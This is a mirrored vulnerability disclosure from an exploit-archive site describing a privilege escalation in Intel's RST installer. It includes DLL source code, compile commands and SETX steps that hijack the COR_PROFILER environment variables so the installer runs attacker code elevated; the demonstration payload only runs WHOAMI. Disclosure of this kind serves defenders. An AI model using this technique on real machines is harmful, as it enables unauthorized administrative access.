Advertisement






Intel RST User Interface / Driver Privilege Escalation

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030170

Below is a copy:

Intel RST User Interface / Driver Privilege Escalation
Hi @ll,

more than 2 years ago I disclosed 2 vulnerabilities leading to
local escalation of privilege in the
Intel Rapid Storage Technology (Intel RST) User Interface and Driver:
see <https://seclists.org/fulldisclosure/2018/Nov/45>
and <https://seclists.org/fulldisclosure/2018/Nov/52>

Intel fixed this vulnerability only in their executable installer.

Some time later Intel rewrote or rebuilt this installer (see
<https://downloadcenter.intel.com/download/29978/Intel-Rapid-Storage-Technology-Driver-Installation-Software-with-Intel-Optane-Memor
y>
for its current version 18.0.1.1138, published 10/15/2020)
and incorporated the second vulnerability.

CVSS 3.0 score: 8.2 High
CVSS 3.0 vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Demonstration:
~~~~~~~~~~~~~~

0. Save the following source as sentinel.c in an arbitrary directory:

--- sentinel.c ---
// Copyright (C) 2004-2021, Stefan Kanthak <[email protected]>

#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN

#include <windows.h>

const STARTUPINFO si = {sizeof(si)};

__declspec(safebuffers)
BOOL WINAPI _DllMainCRTStartup(HANDLE  hModule,
                               DWORD   dwReason,
                               CONTEXT *lpContext)
{
    WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL";

    PROCESS_INFORMATION pi;

    if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE,
                      CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT,
                      NULL, NULL, &si, &pi))
    {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }

    return TRUE;
}
--- EOF ---

1. Start the command prompt of the 32-bit Windows Software Development Kit,
   then run the following command lines to compile sentinel.c and link it
   as sentinel.dll:

   cl.exe /Zl /W4 /O2 /GAFy /c sentinel.c
   link.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /RELEASE /SUBSYSTEM:Windows sentinel.obj
kernel32.lib

ALTERNATIVE for steps 0 and 1:

1. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>
   and save it in an arbitrary directory.

2. Logon with the user account created during Windows setup.

3. Start a command prompt (unelevated!) and run the following command lines
   (replace <directory> with the pathname of the directory where you built
   or saved sentinel.dll):

   SETX.exe COR_ENABLE_PROFILING 1
   SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
   SETX.exe COR_PROFILER_PATH <directory>\sentinel.dll

   JFTR: this is just one method to set these environment variables without
         the need to elevate!

4. Download <https://downloadmirror.intel.com/29978/eng/SetupRST.exe> and
   save it in an arbitrary directory.

5. Execute SetupRST.exe per double-click, acknowledge the UAC prompt, then
   admire the console windows showing the output of WHOAMI.exe running
   elevated.

stay tuned, and FAR AWAY from vulnerable crap built by Intel
Stefan Kanthak



Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum